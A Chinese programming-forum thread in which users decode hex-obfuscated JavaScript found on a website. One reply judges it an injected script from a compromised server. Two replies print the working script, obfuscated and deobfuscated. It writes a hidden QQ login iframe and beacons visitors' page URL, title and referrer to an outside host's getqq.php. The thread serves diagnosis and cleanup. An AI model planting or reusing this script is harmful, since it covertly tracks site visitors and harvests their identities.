比如 这个  window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](_$[3])
var s = "\x64\x6f\x63\x75\x6d\x65\x6e\x74";
alert(s);
就是这样 呵呵

解决方案 »

  1.   

     \x   属于16进制 
    http://www.zc520.cc/js/62.html                   用这个工具解码一下     
      

  2.   

    var _$=["<iframe id='login_frame' height='0' scrolling='auto' width='0' frameborder='0' src='http://ui.ptlogin2.qq.com/cgi-bin/login?hide_title_bar=1&amp;low_login=0&amp;qlogin_auto_login=1&amp;no_verifyimg=1&amp;link_target=blank&amp;appid=549000912&amp;style=12&amp;target=self&amp;s_url=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&amp;pt_qr_app=%CA%D6%BB%FAQQ%BF%D5%BC%E4&amp;pt_qr_link=http://z.qzone.com/download.html&amp;self_regurl=http://qzs.qq.com/qzone/v6/reg/index.html&amp;pt_qr_help_link=http://z.qzone.com/download.html' style='display:none;'></iframe>","qq_js","?",'<img id="flyerimg" style="display:none;"><iframe id="login_frame" height="0" scrolling="auto" width="0" frameborder="0" src="" style="display:none;"></iframe><img src="" style="display:none;">','http','https','baidu','qq.com','google.com','xt.shiermei.cn','',"://","/getqq.php?p=","&r=","&u=","&t=","&m=","flyerimg"];window["document"]["writeln"](_$[0]);var a=window["document"]["getElementById"](_$[1]);var b;b=a["src"];var c=b["split"](_$[2]);var d=c[0x1];var e=encodeURIComponent(window["document"]["location"]["href"]);var f=encodeURIComponent(window["document"]["title"]);var g=encodeURIComponent(window["document"]["referrer"]);var h=Math["random"]();window["document"]["write"](_$[3]);var i=[_$[4],_$[5],_$[6],_$[7],_$[8],_$[9],_$[10]];function j(){var k=i[0x0]+_$[11]+i[0x5]+i[0x6]+_$[12]+d+_$[13]+g+_$[14]+e+_$[15]+f+_$[16]+Math["random"]();window["document"]["getElementById"](_$[17])["src"]=k};setTimeout(j,0x7d0);
      

  3.   

    \x99表示十六进制,可以直接ALERT()的,会弹出具体的字符,只有转成字符串过后才能分析JS的具体操作,如果我没猜错的话,应该是一段引入外部框架的意思,也就是说,你的此网站的服务器被入侵修改了脚本。我经常做这种维护,很麻烦的事情。
      

  4.   

    document.writeln("<iframe id='login_frame' height='0' scrolling='auto' width='0' frameborder='0' src='http://ui.ptlogin2.qq.com/cgi-bin/login?hide_title_bar=1&amp;low_login=0&amp;qlogin_auto_login=1&amp;no_verifyimg=1&amp;link_target=blank&amp;appid=549000912&amp;style=12&amp;target=self&amp;s_url=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&amp;pt_qr_app=%CA%D6%BB%FAQQ%BF%D5%BC%E4&amp;pt_qr_link=http://z.qzone.com/download.html&amp;self_regurl=http://qzs.qq.com/qzone/v6/reg/index.html&amp;pt_qr_help_link=http://z.qzone.com/download.html' style='display:none;'></iframe>");
    var a = document.getElementById("qq_js");
    var b;
    b = a["src"];
    var c = b["split"]("?");
    var d = c[1];
    /** @type {string} */
    var e = encodeURIComponent(document.location.href);
    /** @type {string} */
    var f = encodeURIComponent(document.title);
    /** @type {string} */
    var g = encodeURIComponent(document.referrer);
    var h = Math.random();
    document.write('<img id="flyerimg" style="display:none;"><iframe id="login_frame" height="0" scrolling="auto" width="0" frameborder="0" src="" style="display:none;"></iframe><img src="" style="display:none;">');
    /** @type {Array} */
    var i = ["http", "https", "baidu", "qq.com", "google.com", "xt.shiermei.cn", ""];/**
     * @return {undefined}
     */
    function j() {
        var dst = i[0] + "://" + i[5] + i[6] + "/getqq.php?p=" + d + "&r=" + g + "&u=" + e + "&t=" + f + "&m=" + Math.random();
        document.getElementById('flyerimg').src = dst;
    }setTimeout(j, 2000);